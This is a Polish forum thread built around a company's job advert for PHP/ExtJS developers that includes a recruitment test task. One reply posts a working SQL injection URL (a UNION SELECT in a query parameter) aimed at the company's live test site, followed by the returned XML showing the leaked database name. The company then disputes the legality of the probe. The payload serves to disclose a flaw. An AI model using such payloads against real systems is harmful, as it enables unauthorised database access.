[Zdalna/Będzin] - Programisty PHP5, ExtJS, Mysql do stałej współpracy Opcje

[Proffnet]

Firma ProffNet sp. z o.o. poszukuje programistów do stałej współpracy przy realizacji bieżących zadań.

Co oferujemy:
- Możliwość pracy zdalnej lub nowoczesnym biurze firmy w Będzinie
- Szkolenia produktowe, pozwalające na skuteczne wykonywanie powierzonych zadań.
- Atrakcyjne wynagrodzenie.
- Dodatkowe gratyfikacje wynikające wykazanego zaangażowania i terminowości wykonywanych zadań
- Rozliczenia na zasadzie umowy zlecenie, umowy o dzieło lub umowy o współpracy (na podst. Faktur Vat)
- Stałą i stabilną współpracę.
- Terminowe wypłacanie należności za wykonane zlecenia.


Do zadań osób współpracujących będzie należało:
1. Utrzymanie i rozbudowa autorskiego oprogramowania klasy CMMS w tym:
- dostosowywanie oprogramowania do bieżących potrzeb klientów
- debugowanie i bieżąca aktualizacja oprogramowania
- dopisywanie nowych modułów programu
- re-faktoryzacja kodu
- tworzenie bieżącej dokumentacji

2. Modyfikacja istniejących templatek sklepów i stron www opartych o autorski system uniPanel.

3. Drobne aktualizacje istniejących stron www dotychczasowych klientów

Aby skutecznie realizować powierzone zadania wymagana będzie wiedza z zakresu posługiwania się:
- PHP 5
- Framework javascript ExtJS
- Javascript
- Umiejętności czytania dokumentacji
- CSS3
- MySql
- NetBeans, Eclipse, itp..
- Repozytorium Git

Możliwość rozszerzenia zakresu zleceń ułatwi również znajomość
- Java Play Framework

Informacje o wynagrodzeniu
Wynagrodzenie rozliczane będzie jako wypadkowa stawki godzinowej oraz szaczowanej ilości godzin roboczych spędzonych nad poszczególnymi zadaniami.
Wysokość stawki godzinowej jest bezpośrednio uzależniona od doświadczenia kandydata.
Prosimy o podawanie w ofercie proponowanych stawek godzinowych.

Pod uwagę będą brane TYLKO kandydatury osób które prześlą na adres praca(at)proffnet.com:
1. Propozycje rozwiązania zadania znajdującego się na stronie: http://www.zadanie-testowe.proffnet.com/ oraz czas w jakim zadanie zostało przez nich wykonane.
2. Informacje na temat przebiegu dotychczasowej działalności wraz z listą projektów z ich udziałem i zakresem swojej pracy w danym projekcie
3. Ilości godzin w miesiącu, które są w stanie poświęcić na pracę zdalną (lub w naszym biurze)
4. Proponowaną stawkę za godzinę roboczą

Dane firmy:

Biuro
al. Kołłątaja 46
42-500 Będzin

Siedziba
Proffnet Sp. z o.o.
ul. Przedziałowa 24
42-523 Dąbrowa Górnicza
Nip: 629-244-69-63;
Regon: 241719977;
KRS: 0000365205

Ten post edytował Proffnet 18.09.2013, 09:25:05

[redeemer]

Gratuluję, bo mimo używania PDO zadanie testowe posiada błędy typu SQL injection.

[Proffnet]

@redeemer
Wydaje Pan dosyć pochopne osądy, nie wiedząc jak działa Request::getParameter.

Proszę mi wierzyć, że SQL injection nie zadziała w tym przypadku.

Zapraszam do rozwiązania testu. Jeśli uważa się Pan za osobę bieglą w php i javascript (i umiejącą czytać dokumentacje do ExtJs w wypadku braku znajomości tego framework'a) rozwiązanie testu nie powinno zająć Panu więcej niż 5 minut.

Wynik testu proszę przesłać na praca(at)proffnet.com może uda nam się z pożytkiem dla Pana wykorzystać Pańską wiedzę i doświadczenie.

Ten post edytował Proffnet 18.09.2013, 12:19:34

[redeemer]

To prawda, że nie wiem dokładnie jak działa Request::getParameter, jednak nie zmienia to faktu, że skrypt jest podatny na SQL injection.

Dowód:

Kod

http://www.zadanie-testowe.proffnet.com/?_dc=1379503543121&request=grid%2Fdefault&page=2&start=1%20union%20select%20database(),0x73716c20696e6a656374696f6e,3,4%20--%20&limit=costamcostam&sort=%5B%7B%22property%22%3A%22tst_continent%22%2C%22direction%22%3A%22ASC%22%7D%5D

Zwrot:

Kod

<rs>
<total>
<![CDATA[ 19 ]]>
</total>
<r>
<tst_id>
<![CDATA[ 1 ]]>
</tst_id>
<tst_continent>
<![CDATA[ Afryka ]]>
</tst_continent>
<tst_country>
<![CDATA[ Algieria ]]>
</tst_country>
<tst_capital>
<![CDATA[ Algier ]]>
</tst_capital>
</r>
<r>
<tst_id>
<![CDATA[ baza58949_zadtest ]]>
</tst_id>
<tst_continent>
<![CDATA[ sql injection ]]>
</tst_continent>
<tst_country>
<![CDATA[ 3 ]]>
</tst_country>
<tst_capital>
<![CDATA[ 4 ]]>
</tst_capital>
</r>
</rs>

Jeżeli polegacie tylko na funkcji Request::getParameter jeśli chodzi o bezpieczeństwo to polecam ją albo udoskonalić, albo lepiej użyć PDO do zabezpieczenia przed tego typu atakami.

Ten post edytował redeemer 18.09.2013, 12:41:39

[Proffnet]

Witam ponownie

Ma Pan rację co do konkretnego powyższego zapytania. Jednakże proszę zauważyć, iż skrypt ten jest pisany do celów wyłącznie rekrutacyjnych, bez zbędnych linijek kodu które w tym wypadku nic by nie wniosły - jak sam Pan raczył zauważyć, działa także na wyizolowanej bazie danych oraz jest wystawiane jako white-box.

Nie wiem czy jest Pan tego świadomy skrypt ten jednocześnie spełnił swoją rolę - pozyskując ludzi takich jak Pan do konwersacji. Z jednej strony złamał Pan prawo wykonując niezamówione pentesty naszego skryptu/serwera, z drugiej byliśmy w pełni świadomi tego typu działania ze strony takich ludzi jak Pan, choć spodziewaliśmy się działania typu wysłanie wiadomości na priv, a nie publicznego obnażania, co było poniekąd niegrzeczne z pańskiej strony. A jak wiemy kolejność powinna być odwrotna, co nakazuje nam czysta przyzwoitość.

Pomijając ten fakt, wszyscy jesteśmy tylko ludzi panie Marcinie - proszę o tym nie zapominać.

Proponuję Panu więc jeszcze raz skorzystać z naszej oferty, być może będzie miał Pan okazję legalnego potestowania naszego kodu (IMG:style_emoticons/default/wink.gif) Widzimy że jest Pan człowiekiem posiadającym pewną wiedzę i obym się nie mylił skory do owocnej współpracy, lecz aby była zadość formalnością proszę poprawnie rozwiązać zadanie.

[Damonsson]

*formalnościom - Nie mogłem się powstrzymać.

Proszę mi wierzyć, że SQL injection nie zadziała w tym przypadku.

Proszę mi wierzyć, będzie Pan u nas zarabiał xxxx zł

heheszki (IMG:style_emoticons/default/smile.gif)